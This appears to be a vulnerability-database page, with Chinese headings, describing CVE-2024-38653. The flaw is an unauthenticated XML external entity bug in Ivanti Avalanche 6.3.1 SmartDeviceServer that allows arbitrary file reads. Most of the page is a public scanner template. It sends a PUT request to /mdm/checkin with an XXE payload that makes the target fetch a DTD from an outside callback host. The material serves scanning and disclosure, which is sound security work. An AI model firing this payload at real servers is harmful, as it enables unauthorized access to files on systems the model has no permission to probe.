漏洞描述
XXE in SmartDeviceServer in Ivanti Avalanche 6.3.1 allows a remote unauthenticated attacker to read arbitrary files on the server.
CVE-2024-38653: Ivanti Avalanche SmartDeviceServer - XML External Entity
PoC代码[已公开]
id: CVE-2024-38653
info:
name: Ivanti Avalanche SmartDeviceServer - XML External Entity
author: DhiyaneshDK
severity: high
description: |
XXE in SmartDeviceServer in Ivanti Avalanche 6.3.1 allows a remote unauthenticated attacker to read arbitrary files on the server.
reference:
- https://github.com/D4mianWayne/POCs/tree/main/CVE%202024-38653
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://nvd.nist.gov/vuln/detail/cve-2024-38653
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-38653
cwe-id: CWE-611
epss-score: 0.86261
epss-percentile: 0.99364
cpe: cpe:2.3:a:ivanti:avalanche:6.3.1:*:*:*:premise:*:*:*
metadata:
max-request: 1
vendor: ivanti
product: avalanche
tags: cve,cve2024,intrusive,ivanti,avalanche,xxe,vkev
variables:
filename: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
PUT /mdm/checkin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
<?xml version="1.0" ?>
<!DOCTYPE a [
<!ENTITY % asd SYSTEM "http://{{interactsh-url}}/{{filename}}.dtd">
%asd;
%c;
]>
<a></a>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: interactsh_request
words:
- "User-Agent: Java"
# digest: 490a0046304402207c15c03673fa54c19dccff0e5e01acd4c5e19d5d689123930b8ff7047adec9f6022073c2958cb50f8877165c548ea90ca04ab42174b85ebc65cbc2c3c72f1b07c6d3:922c64590222798bb761d5b6d8e72950